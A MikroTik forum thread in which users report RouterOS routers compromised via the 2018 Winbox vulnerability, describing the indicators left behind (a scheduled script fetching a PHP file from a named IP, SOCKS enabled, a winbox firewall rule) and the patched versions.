Community discussions

MikroTik App
 
User avatar
prozak
newbie
Topic Author
Posts: 45
Joined: Sat Jan 16, 2010 4:01 am

new vulnerability?

Mon Jul 23, 2018 12:55 am

Hello all.

Ive noticed on several routers i have that theres a new vulnerability affecting versions 6.41.3 mostly, im not sure before 6.42.6 though.

The attack involves a creation of a schedule and a script fetching a /mikrotik.php every 30secs under this ip :95.154.216.160
Has anyone noticed the same?
Is Mikrotik aware of this?
 
msatter
Forum Guru
Forum Guru
Posts: 2897
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: new vulnerability?

Mon Jul 23, 2018 1:12 am

Also the same in this topic.

viewtopic.php?f=2&t=137126
 
rjickity
Member Candidate
Member Candidate
Posts: 212
Joined: Sat Jul 17, 2010 10:40 am
Location: Perth, Australia

Re: new vulnerability?

Mon Jul 23, 2018 1:26 am

Yes this is the with box vulnerability from April. You must patch to current as it was fixed in 6.42.1

About 26 hours ago i had a router exploited and it left the same traces (socks enabled, filter rule position 0 allowing winbox, script fetching that PHP file on schedule). it seems very much like someone preparing a botnet
 
msatter
Forum Guru
Forum Guru
Posts: 2897
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: new vulnerability?

Mon Jul 23, 2018 1:46 am

If it is that vulnerability then it is also fixed since RouterOS version: 6.40.8 and 6.43rc4
 
User avatar
vecernik87
Forum Veteran
Forum Veteran
Posts: 882
Joined: Fri Nov 10, 2017 8:19 am

Re: new vulnerability?  [SOLVED]

Mon Jul 23, 2018 2:36 am

April vulnerability (or more like person/group/entity mass-misusing it) was typical with downloading "update.aspx" page. If this one use mikrotik.php, it is likely to be different attacker, who is most probably (but not certainly) using same vulnerability.

Thanks for sharing.
 
User avatar
chechito
Forum Guru
Forum Guru
Posts: 2990
Joined: Sun Aug 24, 2014 3:14 am
Location: Bogota Colombia
Contact:

Re: new vulnerability?

Mon Jul 23, 2018 2:59 am

Hello all.

Ive noticed on several routers i have that theres a new vulnerability affecting versions 6.41.3 mostly, im not sure before 6.42.6 though.

The attack involves a creation of a schedule and a script fetching a /mikrotik.php every 30secs under this ip :95.154.216.160
Has anyone noticed the same?
Is Mikrotik aware of this?

please dont misinform people with this topics

Who is online

Users browsing this forum: andreo, en1gm4, eworm, h3x00r, syasar and 93 guests